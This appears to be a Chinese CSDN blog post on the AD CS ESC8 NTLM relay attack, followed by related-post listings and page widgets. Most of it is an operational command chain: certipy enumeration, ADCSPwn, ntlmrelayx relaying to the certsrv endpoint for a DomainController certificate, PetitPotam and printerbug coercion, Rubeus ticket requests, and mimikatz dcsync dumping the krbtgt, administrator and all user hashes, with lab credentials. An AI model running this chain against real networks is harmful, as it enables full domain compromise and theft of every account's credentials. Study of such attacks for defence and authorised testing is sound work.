ADCS攻击之NTLM Relay攻击 ESC8

已于 2023-03-06 00:23:15 修改
阅读量535 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: ADCS ESC8 证书模板配置错误 内网渗透 域渗透 Powered by 金山文档
于 2023-03-05 23:54:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/adminxe/article/details/129353355
版权

CSDN文章迁移备份

漏洞简介

ADCS在默认安装的时候,其Web接口支持NTLM身份验证并且没有启用任何NTLM Relay保护措施。强制域控制器计算机帐户(DC$)向配置了NTLM中继的主机进行身份验证。身份验证被转发给证书颁发机构(CA)并提出对证书的请求。获取到了DC$的证书后就可以为用户/机器请求TGS/TGT票据,获取相应的权限。

curl http://192.168.11.12/certsrv/ -I

存在ntlm认证:

http://192.168.11.12/certsrv/certfnsh.asp

漏洞利用

# 探测是否存在漏洞

certipy find -u zhangsan@red.lab -p zs@123456 -dc-ip 192.168.149.133 -vulnerable -stdout

certipy find -u zhang@attack.cn -p 321.com -dc-ip 192.168.11.11 -vulnerable -stdout

域内

# 待打,因为会使RPC临时性关闭,需要重启
​
execute-assembly ADCSPwn.exe --adcs ADCS.attack.cn --remote DC.attack.cn
​
ADCSPwn.exe --adcs ADCS.attack.cn --remote DC.attack.cn
CS:
execute-assembly Rubeus.exe asktgt /user:DC2012$ /certificate:<base64-certificate> /ptt
​
dcsync red.lab red\krbtgt
使用ADCSpwn打ESC8需要域控启用WebClient服务,默认是没有安装该功能的。 DC安装桌面体验重启即可:

域外

ntlmrelayx监听获取TGT
# 进行监听
#端口转发
PortBender redirect 445 8445
rportfwd_local 8445 127.0.0.1 8445
python3 ntlmrelayx.py -t http://192.168.11.12/certsrv/certfnsh.asp -smb2support --adcs --template DomainController --smb-port 8445
-------------------------------------------------------
python3 ntlmrelayx.py -t http://192.168.11.12/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller'

将WIN10(域用户机器)的445端口流量备份到8445,然后将WIN10-8445端口转发到CS client端的8445端口,实战中还需要通过socks隧道用proxychains将relay的流量打入到目标环境。因为CS client是通目标IP的,就未作模拟。

# 进行强认证的连接,让域控强制来访问攻击机kali
# 通过监听获取到机器用户的TGT
python3 PetitPotam.py Relayip DCip
python3 PetitPotam.py 192.168.11.6 192.168.11.11
python3 PetitPotam.py -u '' -p '' 192.168.11.6 192.168.11.11

printerbug:
python3 printerbug.py attack/zhang:321.com@192.168.11.11 192.168.11.6

Rebeus 导入证书数据

1、CS操作:
​
Rubeus.exe asktgt /user:dc$ /certificate:xxxxxxxx /ptt
execute-assembly Rubeus.exe asktgt /user:DC$ /certificate:<base64-certificate> /ptt
​
dcsync red.lab red\krbtgt
​
2、mimikatz操作
​
Rubeus.exe asktgt /user:dc$ /certificate:xxxxxxxx /ptt
​
mimikatz.exe
kerberos::list #查看kerberos票据
kerberos::purge #清空以前的票据
kerberos::ptt ticket.kirbi #导入票据
lsadump::dcsync /user:krbtgt /csv #导出krbtgt用户的hash
lsadump::dcsync /user:administrator /csv #导出administrator用户的hash
lsadump::dcsync /user:krbtgt /csv #导出krbtgt用户的hash
lsadump::dcsync /all /csv #导出全部用户的hash
​
Rubeus两种使用方式:
1、Rubeus获取到后,保存为ticket.kirbi,使用mimikatz进行导入票据进而利用
2、Rubeus获取到ticket后直接ptt,mimikatz可直接利用 (首选)

转载请注明:Adminxe's Blog » ADCS攻击之NTLM Relay攻击 ESC8

Adminxe
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ADCS relay
问题很多的小明
07-10 568
ADCS relay
安全|AD CS RelayESC8
weixin_42282189的博客
03-24 7482
作者: 0xYyy 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 国外安全研究人员在6月份已经披露过攻击手法—通过证书进行中继从而来达到攻击控的目的。 https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/ 0x02 AD CS作用 1、证书颁发机构(CA):可以向用户、机构和服务颁发证书。 2、CA WEB注册:用户可以通过web浏览器申请证书。 3、联机响应程序.
PetitPotam漏洞复现(ESC8)结合CVE-2019-1040
whojoe的博客
08-02 3186
PetitPotam漏洞复现环境搭建漏洞复现参考文章 环境搭建 主机 机器名 ip 用户 密码 版本 控1 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 控2 ad2.test.com 192.168.164.146 administrator Aa1234 win2012r2 内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 kali
深入分析ntlm relay to adcs服务的利用(含wireshark抓包分析)
二狗的博客
03-03 628
攻击者能够获取到某个实体的ntlm认证请求,就可以将这份请求转发到攻击者想要访问的服务,并以该实体身份通过身份认证。在本文中,就是通过转发获取到的ntlm请求到adcs服务上,并为其申请证书,完成身份窃取。当ntlm请求的发起方是控时,则可以获取到控机器账户的证书,进而使用证书完成认证进行DCsync,获取管权限。
高速8位ADCs MAX155/MAX156的原理及应用
12-10
高速8位ADCs MAX155/MAX156是由美国MAXIM公司设计的高性能、多通道模数转换器,适用于各种多路信号采集、A/D转换驱动和信号测量应用场景。这两个型号,MAX155拥有8个模拟输入通道,而MAX156则有4个,每个通道都配备...
Interfacing to High Speed ADCs via SPI
07-31
Interfacing to High Speed ADCs via SPI
ADCS Class.zip_ADCS class_ADCS labview_OBD诊断_volkswagen_汽车CAN
07-14
该源代码是基于车载平台上的通讯诊断协议, 能够利用LabVIEW, LabWindows?/CVI, Visual C/C++ 6.0中基于CAN的汽车诊断 兼容Windows 7/Vista/XP/2000和LabVIEW Real-Time 诊断协议:CAN (ISO 15765, OBD-II)的KWP2000 ...
3ADCs_DMA.rar
12-24
描述中的“STM ADC的範例資料,提供學習參考之”指出这是针对STM系列MCU(可能是指意法半导体的STM32系列)的ADC使用的示例代码或文档,旨在帮助学习者理解和应用ADC与DMA的结合技术。 标签“3ADCs”暗示这个资料...
adcs7476.zip
最新发布
01-12
8. **温度补偿**:为了保证在不同环境温度下的稳定工作,ADCS7476内部可能包含温度传感器,以进行温度补偿,保证输出结果的准确性。 9. **封装与应用**:ADCS7476采用小型化封装,如TSSOP或QFN,便于集成到紧凑型...
ADCS证书服务攻击
谢公子的博客
08-06 4480
ADCS支持几种基于HTTP的通过管理员可以安装的其他AD CS服务器角色功能。这些基于http的证书注册接口都是易受攻击NTLM中继攻击,因为没有启用NTLM中继保护,而且Authorization HTTP 标头明确只允许通过 NTLM 身份验证,因此更安全的协议(如 Kerberos)无法使用。 http://10.211.55.4/certsrv/certfnsh.asp 漏洞复现 定位证书服务器机器 certutil -config - -ping ntlmrela
ADCS渗透
qq_18811919的博客
10-10 1721
内网渗透-ADCS
ADCS攻击利用
slash_HK的博客
12-23 4786
一万字呕心沥血,全站最详细ADCS攻击利用方法及细节复现,包括服务器配置等,细节满满,支持走一波,也欢迎各位师傅斧正。
Kerberos安全系列(29) NTLM中间人攻击
prettyX的博客
05-19 713
NTLM中间人攻击 NTLM Relay,中间人攻击或重放攻击是一个意思 2001年,最早由Dystic实现,SMBRelay 2004年,发展为HTTP->SMB,BlackHat,未开源 2007年,HTTP->SMB被集成到MetaSploit 2008年,HTTP->HTTP的NTLM攻击被实现(MS08-067) NTLM认证过程 NTLM中间人实验 1、工具 ntlmrelayx.py ,安装命令 pip install ldap3 dnspytho
NTLM Relay利用
qq_18811919的博客
03-07 3412
讲述了多种NTLM Relay的利用方式包括打印机bug以及PetitPotam强制触发NTLM认证方式以及Exchange RelayADCS Relay的利用
AD CS证书服务中继攻击
网络安全。
03-05 3864
0x1 简介 AD CS支持几种基于HTTP协议的通过管理员可以安装的其他AD CS服务器角色功能,这些基于HTTP的证书注册接口都是易受攻击NTLM中继攻击。 注:借图 0x2 环境信息 控(windows server 2016):192.168.3.129 辅控(windows server 2016):192.168.3.131(AD CS) 内主机(windows 10):192.168.3.171 攻击机(kali):192.168.3.158 搭建ADCS证书服务:https://mp.
红队|渗透重要漏洞总结
渗透测试研究中心
11-24 1300
1.MS14-068kerberos认证,no PAC用户在向 Kerberos 密钥分发中心(KDC)申请TGT(由票据授权服务产生的身份凭证)时,可以伪造自己的 Kerberos 票据漏洞效果:将任意用户提升到管权限利用条件:1.小于2012R2的控 没有打MS14-068的补丁(KB3011780)2.拿下一台加入的计算机3.有这台内计算机的用户密码和Sid利用方式:在《Ker...
Windows Print Spooler 远程代码执行漏洞(CVE-2021-1675)
Adminxe的博客
07-02 2549
0x00 漏洞详情 Microsoft Windows Print Spooler 服务未能限制对RpcAddPrinterDriverEx()函数的访问,该函数可能允许远程身份验证的攻击者以系统权限在易受攻击的系统上执行任意代码。该RpcAddPrinterDriverEx()函数用于在系统上安装打印机驱动程序。此函数的参数之一是DRIVER_CONTAINER对象,它包含有关添加的打印机将使用哪个驱动程序的信息。另一个参数,dwFileCopyFlags指定如何复制替换打印机驱动程序文件。攻击者可..
关于CS上线Linux主机(CrossC2)
Adminxe的博客
07-11 2531
0x01 前言 Cross C2是一个支持Linux & MacOS系统的拓展插件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件。用法我的想法来说,相当于一个小集群,插件化方便利用,实际的渗透中意义并不大,更加实际于命令行渗透,做到无文件落地,过流量检测加密免杀等技术的研究。 简而言之:一个CS的简单小插件,目的就是上线Linux主机, 可做一些简单的操作,记录一下使用过程中遇到的一些问题,并且在使用中操作的正确性。 Cross c2支持架构说明: ..
adcs8162的三态是指什么
01-10
adcs8162的三态是指该器件的输入和输出信号可以分为三种状态:高电平、低电平和高阻态。高电平表示逻辑值"1",低电平表示逻辑值"0",而高阻态表示输入端和输出端之间呈现高阻状态,不会传输信号。 在实际应用中,adcs8162的三态可以用来实现多路选择器、数据总线和控制信号等多种功能。通过控制输入端的状态,可以选择不同的输出信号,实现数据的选择和传输。另外,高阻态也可以用于避免信号干扰和冲突,提高电路的稳定性和可靠性。 总的来说,adcs8162的三态功能为数字电路的设计和应用提供了更多的灵活性和可塑性,可以满足不同的信号处理需求,提升系统性能和工作效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值